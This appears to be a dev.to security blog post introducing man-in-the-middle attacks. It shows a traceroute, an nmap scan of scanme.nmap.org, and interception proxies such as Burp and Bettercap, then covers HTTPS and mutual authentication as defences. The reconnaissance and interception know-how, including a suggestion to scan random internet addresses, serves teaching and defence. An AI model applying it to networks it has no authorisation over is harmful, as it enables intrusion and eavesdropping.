loading...
Cover image for Someone is watching you over the Internet. Protect and Fight Back - Man in the Middle

Someone is watching you over the Internet. Protect and Fight Back - Man in the Middle

shostarsson profile image Rémi Lavedrine ・8 min read

Photo by Chase Clark on Unsplash


In this article, I will explain that anyone can watch all of your activity over the Internet, either on your local network or from the other part of the world, through the Internet.

I know it is a long post, but I tried to make it as enjoyable and understandable to read as I can as this is the most common mean of attack. You should read it to the end as it is very valuable to you to understand one of the most used method for an attacker to compromise your application. That way, you are going to improve a lot the security of your code and of your organisation.

If you prefer to see it on a video, you can find it on my Twitch channel.


I am streaming every Thursday at 9:00pm (GMT+1) on my Twitch channel about Security topics. 🖥️

Feel free to come and say hello 🙋🏼‍♂️, if that is of any interest to you or if reading that article brought some questions and you desperately need answers 🤔, or to watch all the previous topics I covered along the weeks. 🗓

The stream about Man in the Middle attacks is available here.

Here is a clip about it on Twitter :


Introduction

The Internet, as a network can be consider as a spider web. We are very often calling the web actually as it makes sense to represent it.
It is not a direct line from one client to one server.
To see how many hops your data are doing from servers to servers, you can find great tools to do that on the Internet.


Tools to Gather Information over the Network

I am using Network-Tools.com to see how many hops there are between my router and dev.to.

Here, I used traceroute6 on my Linux terminal to do that (install it with sudo apt-get install traceroute):

traceroute6 -n www.dev.to
traceroute to www.dev.to (2606:4700:3034::6818:6d3d) from 2a01:cb08:614:b300:5c9:522:7a8:19b4, 30 hops max, 24 byte packets
 1  2a02:cd09:614:b400:924d:4aff:fde8:fca0  2,905 ms  2,764 ms  2,702 ms
 2  2a02:cd09:a004:204:153:253:77:4  4,373 ms  3,799 ms  3,955 ms
 3  2a02:cgc6:0:505::b  5,089 ms  4,529 ms  4,733 ms
 4  * * *
 5  2001:688:0:2:1::28  6,635 ms  4,792 ms  4,947 ms
 6  2001:688:0:3:8::21c  28,701 ms  8,002 ms  8,377 ms
 7  2400:cb00:19:1024::6ca2:e429  5,845 ms  5,732 ms  5,688 ms

As you can see on that image, there are more than one hop to go from your router to the website. There are actually 7 hops to go from your router to the website.
And on each in-the-middle server, you don't know who owns the server. It can be someone of malicious nature who wants to snitch into your communications.
If your communications are not encrypted through "https", basically all of your traffic is available to anyone that be in the middle (somewhere on one server that transfers the data).

It is what is called a Man in the Middle Attack.

A picture is worth a thousand words, so let's explain this through a picture.
Sniffing over a Network Communication

That is why it is so important to understand that as soon you are not encrypting your communications using "https" anyone in the middle can listen to your communications.


What are the tools that can do Man in the Middle ?

With nmap, you can discover what servers or machines are on the network, know what are the open ports, know what is the Operating System runnning on these machines and a lot of other very valuables information for an attacker.
Nmap is definitely a tool that you have to know and to know to use if you want to assess the security of your network. That way, you will know if your network is at risk, what are the open port on your machines, are they open on purpose ?

  • If not, be sure to close them off.
  • If they are, be sure to add some pretty strong authentication to use them (Certificates on ssh port 22 for example).

Here is the result of a scan on "scanme.nmap.org" :

nmap -A scanme.nmap.org 

Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-22 15:45 CEST
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.17s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 991 closed ports
PORT      STATE    SERVICE      VERSION
22/tcp    open     ssh          OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ac:00:a0:1a:82:ff:cc:55:99:dc:67:2b:34:97:6b:75 (DSA)
|   2048 20:3d:2d:44:62:2a:b0:5a:9d:b5:b3:05:14:c2:a6:b2 (RSA)
|   256 96:02:bb:5e:57:54:1c:4e:45:2f:56:4c:4a:24:b2:57 (ECDSA)
|_  256 33:fa:91:0f:e0:e1:7b:1f:6d:05:a2:b0:f1:54:41:56 (EdDSA)
25/tcp    filtered smtp
80/tcp    open     http         Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Go ahead and ScanMe!
139/tcp   filtered netbios-ssn
179/tcp   filtered bgp
445/tcp   filtered microsoft-ds
8045/tcp  filtered unknown
9929/tcp  open     nping-echo   Nping echo
31337/tcp open     tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.91 seconds

nmap has a lot of features, you should explore the nmap documentation to better about it. It can take a lot of time to really master Nmap but it is definitely worth it.

You can then automate it to scan random IP addresses on the internet and discover unprotected machines.
If you are thinking of creating something like this, a service is already doing it. It's Shodan.io.
Shodan Website

Now that we did the Recognition phase, let's get "in the Middle". ;-)


Tools to Listen to a Communication over a Network

As we talked about the OWASP in a previous article, you may have heard about ZAP.
OWASP ZAP

You can use as well Burp Suite.
Brup Suite

Charles Proxy, for fellow MacOS users.
Charles Proxy

or Bettercap, if you love the command line and its offered possibilities to script it.
Bettercap

With all these tools, you can listen to the network and perform Man in the Middle attacks.
Start with your own computer to know how to use these tools.

The Burp Suite Labs is a perfect start to learn how to use it.
You can find it here : Web Security Academy: Free Online Training from PortSwigger

Any network related CTF is a perfect candidate as well to train your skills with these tools.
I am using Root Me very frequently and I recommend this platform to train and learn. Hack The Box is a really good platform as well to learn and train.

Use the tool that better suits you. Every one of them is a really good one.


What is a Man in the Middle Attack

A Man in the Middle attack consists on listening to the conversation between two machines on the network.
You can just listen and forward the traffic, in order to gather information.

Or you can modify the traffic from the client to the server or from the server to the client without anyone of them even knowing that the traffic is not the one intended.
It is very useful to gather some very interesting information from the user or attack a user.

Here is a picture that describes a Man in the Middle in a very simple way.
Sniffing over a Network Communication


Perform a Man in the Middle Attack

I chose a challenge on the Root-me website to illustrate how you can just get yourself in the Middle of a communication with these tools and then modify the content.
On Firefox, you just have to install an add-on to set up a specific proxy to redirect the traffic to your tool (I am using Burp Suite on the video).

As you can see on the video, it is pretty easy to change anything on the request from Headers to content, to HTTP verb, etc...
That gives you a lot of latitude about the kind of attack you want to perform.

And then you can automate it for testing purpose on your application, server, whatever to be sure it stays secure.


Protect from MitM Attacks

There are countless ways to stay secure from MitM attacks or at least make it really complicated for an attacker to make this kind of attack successful.
First, be sure to implement "https" on your website. So your traffic in encrypted and someone that is going to sniff on your network is not going to immediately see your traffic, with you even knowing.
If you are implementing a server, you should use a certificate to be sure that the traffic the client is receiving is coming from a safe source.
Indeed, modern browsers are going to pop up a warning to users if the certificate is not from a trust entity.

Then if you really want to be sure that your traffic is safe and you control both client and server, you can use mutual authentication to encrypt and sign your traffic. That means that the client and server are sharing a common certificate and are going to reject (and obviously alert the supervision) if the certificate is not one they are expecting.
It is a little overkill, but at some point and for specific data, it can be interesting.


Conclusion

Man in the Middle attacks and how to get unnoticed on a network is the basics of a pentester and as a security engineer, you must know how it works so that you understand what countermeasures you should put in place in order to stay secure from this kind of attacks.
Understanding that, you will understand why you should never trust user input and always double check user input based on the data you have on your server.


Thank you so much for reading it to this point.
I hope you enjoyed reading it and learned something.

Leave me a message if CTF is already something that you are doing.
Tell me what you think about these kind attacks and these tools. Are you using other tools to listen to the network ?
I’ll be happy to see that I participate adding security to an organisation or that one person discovered something new reading that article and is going to upgrade its game in terms of security. 💪

That would mean a lot to me.

Posted on by:

shostarsson profile

Rémi Lavedrine

@shostarsson

Software Dev turned Security Dev. Follow me on dev.to, twitch.tv/shostarsson or youtube.com/shostarsson

Discussion

pic
Editor guide